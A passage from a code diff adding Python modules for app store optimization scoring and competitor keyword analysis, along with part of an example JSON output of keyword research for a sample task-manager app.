downloads_trend = conversion.get('downloads_trend', 'stable') # 'up', 'stable', 'down'
|
||||
|
||||
# Conversion rate score (0-70 points)
|
||||
if conversion_rate >= self.BENCHMARKS['conversion_rate']['target']:
|
||||
conversion_score = 70
|
||||
elif conversion_rate >= self.BENCHMARKS['conversion_rate']['min']:
|
||||
proportion = (conversion_rate - self.BENCHMARKS['conversion_rate']['min']) / \
|
||||
(self.BENCHMARKS['conversion_rate']['target'] - self.BENCHMARKS['conversion_rate']['min'])
|
||||
conversion_score = 35 + (proportion * 35)
|
||||
else:
|
||||
conversion_score = (conversion_rate / self.BENCHMARKS['conversion_rate']['min']) * 35
|
||||
|
||||
# Download velocity score (0-20 points)
|
||||
if downloads_30d > 10000:
|
||||
velocity_score = 20
|
||||
elif downloads_30d > 1000:
|
||||
velocity_score = 15
|
||||
elif downloads_30d > 100:
|
||||
velocity_score = 10
|
||||
else:
|
||||
velocity_score = 5
|
||||
|
||||
# Trend bonus (0-10 points)
|
||||
if downloads_trend == 'up':
|
||||
trend_score = 10
|
||||
elif downloads_trend == 'stable':
|
||||
trend_score = 5
|
||||
else:
|
||||
trend_score = 0
|
||||
|
||||
total_score = conversion_score + velocity_score + trend_score
|
||||
|
||||
return round(min(total_score, 100), 1)
|
||||
|
||||
def generate_recommendations(
|
||||
self,
|
||||
metadata_score: float,
|
||||
ratings_score: float,
|
||||
keyword_score: float,
|
||||
conversion_score: float
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Generate prioritized recommendations based on scores."""
|
||||
recommendations = []
|
||||
|
||||
# Metadata recommendations
|
||||
if metadata_score < 60:
|
||||
recommendations.append({
|
||||
'category': 'metadata_quality',
|
||||
'priority': 'high',
|
||||
'action': 'Optimize app title and description',
|
||||
'details': 'Add more keywords to title, expand description to 1500-2000 characters, improve keyword density to 3-5%',
|
||||
'expected_impact': 'Improve discoverability and ranking potential'
|
||||
})
|
||||
elif metadata_score < 80:
|
||||
recommendations.append({
|
||||
'category': 'metadata_quality',
|
||||
'priority': 'medium',
|
||||
'action': 'Refine metadata for better keyword targeting',
|
||||
'details': 'Test variations of title/subtitle, optimize keyword field for Apple',
|
||||
'expected_impact': 'Incremental ranking improvements'
|
||||
})
|
||||
|
||||
# Ratings recommendations
|
||||
if ratings_score < 60:
|
||||
recommendations.append({
|
||||
'category': 'ratings_reviews',
|
||||
'priority': 'high',
|
||||
'action': 'Improve rating quality and volume',
|
||||
'details': 'Address top user complaints, implement in-app rating prompts, respond to negative reviews',
|
||||
'expected_impact': 'Better conversion rates and trust signals'
|
||||
})
|
||||
elif ratings_score < 80:
|
||||
recommendations.append({
|
||||
'category': 'ratings_reviews',
|
||||
'priority': 'medium',
|
||||
'action': 'Increase rating velocity',
|
||||
'details': 'Optimize timing of rating requests, encourage satisfied users to rate',
|
||||
'expected_impact': 'Sustained rating quality'
|
||||
})
|
||||
|
||||
# Keyword performance recommendations
|
||||
if keyword_score < 60:
|
||||
recommendations.append({
|
||||
'category': 'keyword_performance',
|
||||
'priority': 'high',
|
||||
'action': 'Improve keyword rankings',
|
||||
'details': 'Target long-tail keywords with lower competition, update metadata with high-potential keywords, build backlinks',
|
||||
'expected_impact': 'Significant improvement in organic visibility'
|
||||
})
|
||||
elif keyword_score < 80:
|
||||
recommendations.append({
|
||||
'category': 'keyword_performance',
|
||||
'priority': 'medium',
|
||||
'action': 'Expand keyword coverage',
|
||||
'details': 'Target additional related keywords, test seasonal keywords, localize for new markets',
|
||||
'expected_impact': 'Broader reach and more discovery opportunities'
|
||||
})
|
||||
|
||||
# Conversion recommendations
|
||||
if conversion_score < 60:
|
||||
recommendations.append({
|
||||
'category': 'conversion_metrics',
|
||||
'priority': 'high',
|
||||
'action': 'Optimize store listing for conversions',
|
||||
'details': 'Improve screenshots and icon, strengthen value proposition in description, add video preview',
|
||||
'expected_impact': 'Higher impression-to-install conversion'
|
||||
})
|
||||
elif conversion_score < 80:
|
||||
recommendations.append({
|
||||
'category': 'conversion_metrics',
|
||||
'priority': 'medium',
|
||||
'action': 'Test visual asset variations',
|
||||
'details': 'A/B test different icon designs and screenshot sequences',
|
||||
'expected_impact': 'Incremental conversion improvements'
|
||||
})
|
||||
|
||||
return recommendations
|
||||
|
||||
def _assess_health_status(self, overall_score: float) -> str:
|
||||
"""Assess overall ASO health status."""
|
||||
if overall_score >= 80:
|
||||
return "Excellent - Top-tier ASO performance"
|
||||
elif overall_score >= 65:
|
||||
return "Good - Competitive ASO with room for improvement"
|
||||
elif overall_score >= 50:
|
||||
return "Fair - Needs strategic improvements"
|
||||
else:
|
||||
return "Poor - Requires immediate ASO overhaul"
|
||||
|
||||
def _prioritize_actions(
|
||||
self,
|
||||
recommendations: List[Dict[str, Any]]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Prioritize actions by impact and urgency."""
|
||||
# Sort by priority (high first) and expected impact
|
||||
priority_order = {'high': 0, 'medium': 1, 'low': 2}
|
||||
|
||||
sorted_recommendations = sorted(
|
||||
recommendations,
|
||||
key=lambda x: priority_order[x['priority']]
|
||||
)
|
||||
|
||||
return sorted_recommendations[:3] # Top 3 priority actions
|
||||
|
||||
def _identify_strengths(self, score_breakdown: Dict[str, Any]) -> List[str]:
|
||||
"""Identify areas of strength (scores >= 75)."""
|
||||
strengths = []
|
||||
|
||||
for category, data in score_breakdown.items():
|
||||
if data['score'] >= 75:
|
||||
strengths.append(
|
||||
f"{category.replace('_', ' ').title()}: {data['score']}/100"
|
||||
)
|
||||
|
||||
return strengths if strengths else ["Focus on building strengths across all areas"]
|
||||
|
||||
def _identify_weaknesses(self, score_breakdown: Dict[str, Any]) -> List[str]:
|
||||
"""Identify areas needing improvement (scores < 60)."""
|
||||
weaknesses = []
|
||||
|
||||
for category, data in score_breakdown.items():
|
||||
if data['score'] < 60:
|
||||
weaknesses.append(
|
||||
f"{category.replace('_', ' ').title()}: {data['score']}/100 - needs improvement"
|
||||
)
|
||||
|
||||
return weaknesses if weaknesses else ["All areas performing adequately"]
|
||||
|
||||
|
||||
def calculate_aso_score(
|
||||
metadata: Dict[str, Any],
|
||||
ratings: Dict[str, Any],
|
||||
keyword_performance: Dict[str, Any],
|
||||
conversion: Dict[str, Any]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to calculate ASO score.
|
||||
|
||||
Args:
|
||||
metadata: Metadata quality metrics
|
||||
ratings: Ratings data
|
||||
keyword_performance: Keyword ranking data
|
||||
conversion: Conversion metrics
|
||||
|
||||
Returns:
|
||||
Complete ASO score report
|
||||
"""
|
||||
scorer = ASOScorer()
|
||||
return scorer.calculate_overall_score(
|
||||
metadata,
|
||||
ratings,
|
||||
keyword_performance,
|
||||
conversion
|
||||
)
|
||||
@ -0,0 +1,577 @@
|
||||
"""
|
||||
Competitor analysis module for App Store Optimization.
|
||||
Analyzes top competitors' ASO strategies and identifies opportunities.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional
|
||||
from collections import Counter
|
||||
import re
|
||||
|
||||
|
||||
class CompetitorAnalyzer:
|
||||
"""Analyzes competitor apps to identify ASO opportunities."""
|
||||
|
||||
def __init__(self, category: str, platform: str = 'apple'):
|
||||
"""
|
||||
Initialize competitor analyzer.
|
||||
|
||||
Args:
|
||||
category: App category (e.g., "Productivity", "Games")
|
||||
platform: 'apple' or 'google'
|
||||
"""
|
||||
self.category = category
|
||||
self.platform = platform
|
||||
self.competitors = []
|
||||
|
||||
def analyze_competitor(
|
||||
self,
|
||||
app_data: Dict[str, Any]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Analyze a single competitor's ASO strategy.
|
||||
|
||||
Args:
|
||||
app_data: Dictionary with app_name, title, description, rating, ratings_count, keywords
|
||||
|
||||
Returns:
|
||||
Comprehensive competitor analysis
|
||||
"""
|
||||
app_name = app_data.get('app_name', '')
|
||||
title = app_data.get('title', '')
|
||||
description = app_data.get('description', '')
|
||||
rating = app_data.get('rating', 0.0)
|
||||
ratings_count = app_data.get('ratings_count', 0)
|
||||
keywords = app_data.get('keywords', [])
|
||||
|
||||
analysis = {
|
||||
'app_name': app_name,
|
||||
'title_analysis': self._analyze_title(title),
|
||||
'description_analysis': self._analyze_description(description),
|
||||
'keyword_strategy': self._extract_keyword_strategy(title, description, keywords),
|
||||
'rating_metrics': {
|
||||
'rating': rating,
|
||||
'ratings_count': ratings_count,
|
||||
'rating_quality': self._assess_rating_quality(rating, ratings_count)
|
||||
},
|
||||
'competitive_strength': self._calculate_competitive_strength(
|
||||
rating,
|
||||
ratings_count,
|
||||
len(description)
|
||||
),
|
||||
'key_differentiators': self._identify_differentiators(description)
|
||||
}
|
||||
|
||||
self.competitors.append(analysis)
|
||||
return analysis
|
||||
|
||||
def compare_competitors(
|
||||
self,
|
||||
competitors_data: List[Dict[str, Any]]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Compare multiple competitors and identify patterns.
|
||||
|
||||
Args:
|
||||
competitors_data: List of competitor data dictionaries
|
||||
|
||||
Returns:
|
||||
Comparative analysis with insights
|
||||
"""
|
||||
# Analyze each competitor
|
||||
analyses = []
|
||||
for comp_data in competitors_data:
|
||||
analysis = self.analyze_competitor(comp_data)
|
||||
analyses.append(analysis)
|
||||
|
||||
# Extract common keywords across competitors
|
||||
all_keywords = []
|
||||
for analysis in analyses:
|
||||
all_keywords.extend(analysis['keyword_strategy']['primary_keywords'])
|
||||
|
||||
common_keywords = self._find_common_keywords(all_keywords)
|
||||
|
||||
# Identify keyword gaps (used by some but not all)
|
||||
keyword_gaps = self._identify_keyword_gaps(analyses)
|
||||
|
||||
# Rank competitors by strength
|
||||
ranked_competitors = sorted(
|
||||
analyses,
|
||||
key=lambda x: x['competitive_strength'],
|
||||
reverse=True
|
||||
)
|
||||
|
||||
# Analyze rating distribution
|
||||
rating_analysis = self._analyze_rating_distribution(analyses)
|
||||
|
||||
# Identify best practices
|
||||
best_practices = self._identify_best_practices(ranked_competitors)
|
||||
|
||||
return {
|
||||
'category': self.category,
|
||||
'platform': self.platform,
|
||||
'competitors_analyzed': len(analyses),
|
||||
'ranked_competitors': ranked_competitors,
|
||||
'common_keywords': common_keywords,
|
||||
'keyword_gaps': keyword_gaps,
|
||||
'rating_analysis': rating_analysis,
|
||||
'best_practices': best_practices,
|
||||
'opportunities': self._identify_opportunities(
|
||||
analyses,
|
||||
common_keywords,
|
||||
keyword_gaps
|
||||
)
|
||||
}
|
||||
|
||||
def identify_gaps(
|
||||
self,
|
||||
your_app_data: Dict[str, Any],
|
||||
competitors_data: List[Dict[str, Any]]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Identify gaps between your app and competitors.
|
||||
|
||||
Args:
|
||||
your_app_data: Your app's data
|
||||
competitors_data: List of competitor data
|
||||
|
||||
Returns:
|
||||
Gap analysis with actionable recommendations
|
||||
"""
|
||||
# Analyze your app
|
||||
your_analysis = self.analyze_competitor(your_app_data)
|
||||
|
||||
# Analyze competitors
|
||||
competitor_comparison = self.compare_competitors(competitors_data)
|
||||
|
||||
# Identify keyword gaps
|
||||
your_keywords = set(your_analysis['keyword_strategy']['primary_keywords'])
|
||||
competitor_keywords = set(competitor_comparison['common_keywords'])
|
||||
missing_keywords = competitor_keywords - your_keywords
|
||||
|
||||
# Identify rating gap
|
||||
avg_competitor_rating = competitor_comparison['rating_analysis']['average_rating']
|
||||
rating_gap = avg_competitor_rating - your_analysis['rating_metrics']['rating']
|
||||
|
||||
# Identify description length gap
|
||||
avg_competitor_desc_length = sum(
|
||||
len(comp['description_analysis']['text'])
|
||||
for comp in competitor_comparison['ranked_competitors']
|
||||
) / len(competitor_comparison['ranked_competitors'])
|
||||
your_desc_length = len(your_analysis['description_analysis']['text'])
|
||||
desc_length_gap = avg_competitor_desc_length - your_desc_length
|
||||
|
||||
return {
|
||||
'your_app': your_analysis,
|
||||
'keyword_gaps': {
|
||||
'missing_keywords': list(missing_keywords)[:10],
|
||||
'recommendations': self._generate_keyword_recommendations(missing_keywords)
|
||||
},
|
||||
'rating_gap': {
|
||||
'your_rating': your_analysis['rating_metrics']['rating'],
|
||||
'average_competitor_rating': avg_competitor_rating,
|
||||
'gap': round(rating_gap, 2),
|
||||
'action_items': self._generate_rating_improvement_actions(rating_gap)
|
||||
},
|
||||
'content_gap': {
|
||||
'your_description_length': your_desc_length,
|
||||
'average_competitor_length': int(avg_competitor_desc_length),
|
||||
'gap': int(desc_length_gap),
|
||||
'recommendations': self._generate_content_recommendations(desc_length_gap)
|
||||
},
|
||||
'competitive_positioning': self._assess_competitive_position(
|
||||
your_analysis,
|
||||
competitor_comparison
|
||||
)
|
||||
}
|
||||
|
||||
def _analyze_title(self, title: str) -> Dict[str, Any]:
|
||||
"""Analyze title structure and keyword usage."""
|
||||
parts = re.split(r'[-' + r':|]', title)
|
||||
|
||||
return {
|
||||
'title': title,
|
||||
'length': len(title),
|
||||
'has_brand': len(parts) > 0,
|
||||
'has_keywords': len(parts) > 1,
|
||||
'components': [part.strip() for part in parts],
|
||||
'word_count': len(title.split()),
|
||||
'strategy': 'brand_plus_keywords' if len(parts) > 1 else 'brand_only'
|
||||
}
|
||||
|
||||
def _analyze_description(self, description: str) -> Dict[str, Any]:
|
||||
"""Analyze description structure and content."""
|
||||
lines = description.split('\n')
|
||||
word_count = len(description.split())
|
||||
|
||||
# Check for structural elements
|
||||
has_bullet_points = '•' in description or '*' in description
|
||||
has_sections = any(line.isupper() for line in lines if len(line) > 0)
|
||||
has_call_to_action = any(
|
||||
cta in description.lower()
|
||||
for cta in ['download', 'try', 'get', 'start', 'join']
|
||||
)
|
||||
|
||||
# Extract features mentioned
|
||||
features = self._extract_features(description)
|
||||
|
||||
return {
|
||||
'text': description,
|
||||
'length': len(description),
|
||||
'word_count': word_count,
|
||||
'structure': {
|
||||
'has_bullet_points': has_bullet_points,
|
||||
'has_sections': has_sections,
|
||||
'has_call_to_action': has_call_to_action
|
||||
},
|
||||
'features_mentioned': features,
|
||||
'readability': 'good' if 50 <= word_count <= 300 else 'needs_improvement'
|
||||
}
|
||||
|
||||
def _extract_keyword_strategy(
|
||||
self,
|
||||
title: str,
|
||||
description: str,
|
||||
explicit_keywords: List[str]
|
||||
) -> Dict[str, Any]:
|
||||
"""Extract keyword strategy from metadata."""
|
||||
# Extract keywords from title
|
||||
title_keywords = [word.lower() for word in title.split() if len(word) > 3]
|
||||
|
||||
# Extract frequently used words from description
|
||||
desc_words = re.findall(r'\b\w{4,}\b', description.lower())
|
||||
word_freq = Counter(desc_words)
|
||||
frequent_words = [word for word, count in word_freq.most_common(15) if count > 2]
|
||||
|
||||
# Combine with explicit keywords
|
||||
all_keywords = list(set(title_keywords + frequent_words + explicit_keywords))
|
||||
|
||||
return {
|
||||
'primary_keywords': title_keywords,
|
||||
'description_keywords': frequent_words[:10],
|
||||
'explicit_keywords': explicit_keywords,
|
||||
'total_unique_keywords': len(all_keywords),
|
||||
'keyword_focus': self._assess_keyword_focus(title_keywords, frequent_words)
|
||||
}
|
||||
|
||||
def _assess_rating_quality(self, rating: float, ratings_count: int) -> str:
|
||||
"""Assess the quality of ratings."""
|
||||
if ratings_count < 100:
|
||||
return 'insufficient_data'
|
||||
elif rating >= 4.5 and ratings_count > 1000:
|
||||
return 'excellent'
|
||||
elif rating >= 4.0 and ratings_count > 500:
|
||||
return 'good'
|
||||
elif rating >= 3.5:
|
||||
return 'average'
|
||||
else:
|
||||
return 'poor'
|
||||
|
||||
def _calculate_competitive_strength(
|
||||
self,
|
||||
rating: float,
|
||||
ratings_count: int,
|
||||
description_length: int
|
||||
) -> float:
|
||||
"""
|
||||
Calculate overall competitive strength (0-100).
|
||||
|
||||
Factors:
|
||||
- Rating quality (40%)
|
||||
- Rating volume (30%)
|
||||
- Metadata quality (30%)
|
||||
"""
|
||||
# Rating quality score (0-40)
|
||||
rating_score = (rating / 5.0) * 40
|
||||
|
||||
# Rating volume score (0-30)
|
||||
volume_score = min((ratings_count / 10000) * 30, 30)
|
||||
|
||||
# Metadata quality score (0-30)
|
||||
metadata_score = min((description_length / 2000) * 30, 30)
|
||||
|
||||
total_score = rating_score + volume_score + metadata_score
|
||||
|
||||
return round(total_score, 1)
|
||||
|
||||
def _identify_differentiators(self, description: str) -> List[str]:
|
||||
"""Identify key differentiators from description."""
|
||||
differentiator_keywords = [
|
||||
'unique', 'only', 'first', 'best', 'leading', 'exclusive',
|
||||
'revolutionary', 'innovative', 'patent', 'award'
|
||||
]
|
||||
|
||||
differentiators = []
|
||||
sentences = description.split('.')
|
||||
|
||||
for sentence in sentences:
|
||||
sentence_lower = sentence.lower()
|
||||
if any(keyword in sentence_lower for keyword in differentiator_keywords):
|
||||
differentiators.append(sentence.strip())
|
||||
|
||||
return differentiators[:5]
|
||||
|
||||
def _find_common_keywords(self, all_keywords: List[str]) -> List[str]:
|
||||
"""Find keywords used by multiple competitors."""
|
||||
keyword_counts = Counter(all_keywords)
|
||||
# Return keywords used by at least 2 competitors
|
||||
common = [kw for kw, count in keyword_counts.items() if count >= 2]
|
||||
return sorted(common, key=lambda x: keyword_counts[x], reverse=True)[:20]
|
||||
|
||||
def _identify_keyword_gaps(self, analyses: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
|
||||
"""Identify keywords used by some competitors but not others."""
|
||||
all_keywords_by_app = {}
|
||||
|
||||
for analysis in analyses:
|
||||
app_name = analysis['app_name']
|
||||
keywords = analysis['keyword_strategy']['primary_keywords']
|
||||
all_keywords_by_app[app_name] = set(keywords)
|
||||
|
||||
# Find keywords used by some but not all
|
||||
all_keywords_set = set()
|
||||
for keywords in all_keywords_by_app.values():
|
||||
all_keywords_set.update(keywords)
|
||||
|
||||
gaps = []
|
||||
for keyword in all_keywords_set:
|
||||
using_apps = [
|
||||
app for app, keywords in all_keywords_by_app.items()
|
||||
if keyword in keywords
|
||||
]
|
||||
if 1 < len(using_apps) < len(analyses):
|
||||
gaps.append({
|
||||
'keyword': keyword,
|
||||
'used_by': using_apps,
|
||||
'usage_percentage': round(len(using_apps) / len(analyses) * 100, 1)
|
||||
})
|
||||
|
||||
return sorted(gaps, key=lambda x: x['usage_percentage'], reverse=True)[:15]
|
||||
|
||||
def _analyze_rating_distribution(self, analyses: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||
"""Analyze rating distribution across competitors."""
|
||||
ratings = [a['rating_metrics']['rating'] for a in analyses]
|
||||
ratings_counts = [a['rating_metrics']['ratings_count'] for a in analyses]
|
||||
|
||||
return {
|
||||
'average_rating': round(sum(ratings) / len(ratings), 2),
|
||||
'highest_rating': max(ratings),
|
||||
'lowest_rating': min(ratings),
|
||||
'average_ratings_count': int(sum(ratings_counts) / len(ratings_counts)),
|
||||
'total_ratings_in_category': sum(ratings_counts)
|
||||
}
|
||||
|
||||
def _identify_best_practices(self, ranked_competitors: List[Dict[str, Any]]) -> List[str]:
|
||||
"""Identify best practices from top competitors."""
|
||||
if not ranked_competitors:
|
||||
return []
|
||||
|
||||
top_competitor = ranked_competitors[0]
|
||||
practices = []
|
||||
|
||||
# Title strategy
|
||||
title_analysis = top_competitor['title_analysis']
|
||||
if title_analysis['has_keywords']:
|
||||
practices.append(
|
||||
f"Title Strategy: Include primary keyword in title (e.g., '{title_analysis['title']}')"
|
||||
)
|
||||
|
||||
# Description structure
|
||||
desc_analysis = top_competitor['description_analysis']
|
||||
if desc_analysis['structure']['has_bullet_points']:
|
||||
practices.append("Description: Use bullet points to highlight key features")
|
||||
|
||||
if desc_analysis['structure']['has_sections']:
|
||||
practices.append("Description: Organize content with clear section headers")
|
||||
|
||||
# Rating strategy
|
||||
rating_quality = top_competitor['rating_metrics']['rating_quality']
|
||||
if rating_quality in ['excellent', 'good']:
|
||||
practices.append(
|
||||
f"Ratings: Maintain high rating quality ({top_competitor['rating_metrics']['rating']}★) "
|
||||
f"with significant volume ({top_competitor['rating_metrics']['ratings_count']} ratings)"
|
||||
)
|
||||
|
||||
return practices[:5]
|
||||
|
||||
def _identify_opportunities(
|
||||
self,
|
||||
analyses: List[Dict[str, Any]],
|
||||
common_keywords: List[str],
|
||||
keyword_gaps: List[Dict[str, Any]]
|
||||
) -> List[str]:
|
||||
"""Identify ASO opportunities based on competitive analysis."""
|
||||
opportunities = []
|
||||
|
||||
# Keyword opportunities from gaps
|
||||
if keyword_gaps:
|
||||
underutilized_keywords = [
|
||||
gap['keyword'] for gap in keyword_gaps
|
||||
if gap['usage_percentage'] < 50
|
||||
]
|
||||
if underutilized_keywords:
|
||||
opportunities.append(
|
||||
f"Target underutilized keywords: {', '.join(underutilized_keywords[:5])}"
|
||||
)
|
||||
|
||||
# Rating opportunity
|
||||
avg_rating = sum(a['rating_metrics']['rating'] for a in analyses) / len(analyses)
|
||||
if avg_rating < 4.5:
|
||||
opportunities.append(
|
||||
f"Category average rating is {avg_rating:.1f} - opportunity to differentiate with higher ratings"
|
||||
)
|
||||
|
||||
# Content depth opportunity
|
||||
avg_desc_length = sum(
|
||||
a['description_analysis']['length'] for a in analyses
|
||||
) / len(analyses)
|
||||
if avg_desc_length < 1500:
|
||||
opportunities.append(
|
||||
"Competitors have relatively short descriptions - opportunity to provide more comprehensive information"
|
||||
)
|
||||
|
||||
return opportunities[:5]
|
||||
|
||||
def _extract_features(self, description: str) -> List[str]:
|
||||
"""Extract feature mentions from description."""
|
||||
# Look for bullet points or numbered lists
|
||||
lines = description.split('\n')
|
||||
features = []
|
||||
|
||||
for line in lines:
|
||||
line = line.strip()
|
||||
# Check if line starts with bullet or number
|
||||
if line and (line[0] in ['•', '*', '-', '✓'] or line[0].isdigit()):
|
||||
# Clean the line
|
||||
cleaned = re.sub(r'^[•*\-✓\d.)\s]+', '', line)
|
||||
if cleaned:
|
||||
features.append(cleaned)
|
||||
|
||||
return features[:10]
|
||||
|
||||
def _assess_keyword_focus(
|
||||
self,
|
||||
title_keywords: List[str],
|
||||
description_keywords: List[str]
|
||||
) -> str:
|
||||
"""Assess keyword focus strategy."""
|
||||
overlap = set(title_keywords) & set(description_keywords)
|
||||
|
||||
if len(overlap) >= 3:
|
||||
return 'consistent_focus'
|
||||
elif len(overlap) >= 1:
|
||||
return 'moderate_focus'
|
||||
else:
|
||||
return 'broad_focus'
|
||||
|
||||
def _generate_keyword_recommendations(self, missing_keywords: set) -> List[str]:
|
||||
"""Generate recommendations for missing keywords."""
|
||||
if not missing_keywords:
|
||||
return ["Your keyword coverage is comprehensive"]
|
||||
|
||||
recommendations = []
|
||||
missing_list = list(missing_keywords)[:5]
|
||||
|
||||
recommendations.append(
|
||||
f"Consider adding these competitor keywords: {', '.join(missing_list)}"
|
||||
)
|
||||
recommendations.append(
|
||||
"Test keyword variations in subtitle/promotional text first"
|
||||
)
|
||||
recommendations.append(
|
||||
"Monitor competitor keyword changes monthly"
|
||||
)
|
||||
|
||||
return recommendations
|
||||
|
||||
def _generate_rating_improvement_actions(self, rating_gap: float) -> List[str]:
|
||||
"""Generate actions to improve ratings."""
|
||||
actions = []
|
||||
|
||||
if rating_gap > 0.5:
|
||||
actions.append("CRITICAL: Significant rating gap - prioritize user satisfaction improvements")
|
||||
actions.append("Analyze negative reviews to identify top issues")
|
||||
actions.append("Implement in-app rating prompts after positive experiences")
|
||||
actions.append("Respond to all negative reviews professionally")
|
||||
elif rating_gap > 0.2:
|
||||
actions.append("Focus on incremental improvements to close rating gap")
|
||||
actions.append("Optimize timing of rating requests")
|
||||
else:
|
||||
actions.append("Ratings are competitive - maintain quality and continue improvements")
|
||||
|
||||
return actions
|
||||
|
||||
def _generate_content_recommendations(self, desc_length_gap: int) -> List[str]:
|
||||
"""Generate content recommendations based on length gap."""
|
||||
recommendations = []
|
||||
|
||||
if desc_length_gap > 500:
|
||||
recommendations.append(
|
||||
"Expand description to match competitor detail level"
|
||||
)
|
||||
recommendations.append(
|
||||
"Add use case examples and success stories"
|
||||
)
|
||||
recommendations.append(
|
||||
"Include more feature explanations and benefits"
|
||||
)
|
||||
elif desc_length_gap < -500:
|
||||
recommendations.append(
|
||||
"Consider condensing description for better readability"
|
||||
)
|
||||
recommendations.append(
|
||||
"Focus on most important features first"
|
||||
)
|
||||
else:
|
||||
recommendations.append(
|
||||
"Description length is competitive"
|
||||
)
|
||||
|
||||
return recommendations
|
||||
|
||||
def _assess_competitive_position(
|
||||
self,
|
||||
your_analysis: Dict[str, Any],
|
||||
competitor_comparison: Dict[str, Any]
|
||||
) -> str:
|
||||
"""Assess your competitive position."""
|
||||
your_strength = your_analysis['competitive_strength']
|
||||
competitors = competitor_comparison['ranked_competitors']
|
||||
|
||||
if not competitors:
|
||||
return "No comparison data available"
|
||||
|
||||
# Find where you'd rank
|
||||
better_than_count = sum(
|
||||
1 for comp in competitors
|
||||
if your_strength > comp['competitive_strength']
|
||||
)
|
||||
|
||||
position_percentage = (better_than_count / len(competitors)) * 100
|
||||
|
||||
if position_percentage >= 75:
|
||||
return "Strong Position: Top quartile in competitive strength"
|
||||
elif position_percentage >= 50:
|
||||
return "Competitive Position: Above average, opportunities for improvement"
|
||||
elif position_percentage >= 25:
|
||||
return "Challenging Position: Below average, requires strategic improvements"
|
||||
else:
|
||||
return "Weak Position: Bottom quartile, major ASO overhaul needed"
|
||||
|
||||
|
||||
def analyze_competitor_set(
|
||||
category: str,
|
||||
competitors_data: List[Dict[str, Any]],
|
||||
platform: str = 'apple'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to analyze a set of competitors.
|
||||
|
||||
Args:
|
||||
category: App category
|
||||
competitors_data: List of competitor data
|
||||
platform: 'apple' or 'google'
|
||||
|
||||
Returns:
|
||||
Complete competitive analysis
|
||||
"""
|
||||
analyzer = CompetitorAnalyzer(category, platform)
|
||||
return analyzer.compare_competitors(competitors_data)
|
||||
170
packages/llm/skills/app-store-optimization/expected_output.json
Normal file
170
packages/llm/skills/app-store-optimization/expected_output.json
Normal file
@ -0,0 +1,170 @@
|
||||
{
|
||||
"request_type": "keyword_research",
|
||||
"app_name": "TaskFlow Pro",
|
||||
"keyword_analysis": {
|
||||
"total_keywords_analyzed": 25,
|
||||
"primary_keywords": [
|
||||
{
|
||||
"keyword": "task manager",
|
||||
"search_volume": 45000,
|
||||
"competition_level": "high",
|
||||
"relevance_score": 0.95,
|
||||
"difficulty_score": 72.5,
|
||||
"potential_score": 78.3,
|
||||
"recommendation": "High priority - target immediately"
|
||||
},
|
||||
{
|
||||
"keyword": "productivity app",
|
||||
"search_volume": 38000,
|
||||
"competition_level": "high",
|
||||
"relevance_score": 0.90,
|
||||
"difficulty_score": 68.2,
|
||||
"potential_score": 75.1,
|
||||
"recommendation": "High priority - target immediately"
|
||||
},
|
||||
{
|
||||
"keyword": "todo list",
|
||||
"search_volume": 52000,
|
||||
"competition_level": "very_high",
|
||||
"relevance_score": 0.85,
|
||||
"difficulty_score": 78.9,
|
||||
"potential_score": 71.4,
|
||||
"recommendation": "High priority - target immediately"
|
||||
}
|
||||
],
|
||||
"secondary_keywords": [
|
||||
{
|
||||
"keyword": "team task manager",
|
||||
"search_volume": 8500,
|
||||
"competition_level": "medium",
|
||||
"relevance_score": 0.88,
|
||||
"difficulty_score": 42.3,
|
||||
"potential_score": 68.7,
|
||||
"recommendation": "Good opportunity - include in metadata"
|
||||
},
|
||||
{
|
||||
"keyword": "project planning app",
|
||||
"search_volume": 12000,
|
||||
"competition_level": "medium",
|
||||
"relevance_score": 0.75,
|
||||
"difficulty_score": 48.1,
|
||||
"potential_score": 64.2,
|
||||
"recommendation": "Good opportunity - include in metadata"
|
||||
}
|
||||
],
|
||||
"long_tail_keywords": [
|
||||
{
|
||||
"keyword": "ai task prioritization",
|
||||
"search_volume": 2800,
|
||||
"competition_level": "low",
|
||||
"relevance_score": 0.95,
|
||||
"difficulty_score": 25.4,
|
||||
"potential_score": 82.6,
|
||||
"recommendation": "Excellent long-tail opportunity"
|
||||
},
|
||||
{
|
||||
"keyword": "team productivity tool",
|
||||
"search_volume": 3500,
|
||||
"competition_level": "low",
|
||||
"relevance_score": 0.85,
|
||||
"difficulty_score": 28.7,
|
||||
"potential_score": 79.3,
|
||||
"recommendation": "Excellent long-tail opportunity"
|
||||
}
|
||||
]
|
||||
},
|
||||
"competitor_insights": {
|
||||
"competitors_analyzed": 4,
|
||||
"common_keywords": [
|
||||
"task",
|
||||
"todo",
|
||||
"list",
|
||||
"productivity",
|
||||
"organize",
|
||||
"manage"
|
||||
],
|
||||
"keyword_gaps": [
|
||||
{
|
||||
"keyword": "ai prioritization",
|
||||
"used_by": ["None of the major competitors"],
|
||||
"opportunity": "Unique positioning opportunity"
|
||||
},
|
||||
{
|
||||
"keyword": "smart task manager",
|
||||
"used_by": ["Things 3"],
|
||||
"opportunity": "Underutilized by most competitors"
|
||||
}
|
||||
]
|
||||
},
|
||||
"metadata_recommendations": {
|
||||
"apple_app_store": {
|
||||
"title_options": [
|
||||
{
|
||||
"title": "TaskFlow - AI Task Manager",
|
||||
"length": 26,
|
||||
"keywords_included": ["task manager", "ai"],
|
||||
"strategy": "brand_plus_primary"
|
||||
},
|
||||
{
|
||||
"title": "TaskFlow: Smart Todo & Tasks",
|
||||
"length": 29,
|
||||
"keywords_included": ["todo", "tasks"],
|
||||
"strategy": "brand_plus_multiple"
|
||||
}
|
||||
],
|
||||
"subtitle_recommendation": "AI-Powered Team Productivity",
|
||||
"keyword_field": "productivity,organize,planner,schedule,workflow,reminders,collaboration,calendar,sync,priorities",
|
||||
"description_focus": "Lead with AI differentiation, emphasize team features"
|
||||
},
|
||||
"google_play_store": {
|
||||
"title_options": [
|
||||
{
|
||||
"title": "TaskFlow - AI Task Manager & Team Productivity",
|
||||
"length": 48,
|
||||
"keywords_included": ["task manager", "ai", "team", "productivity"],
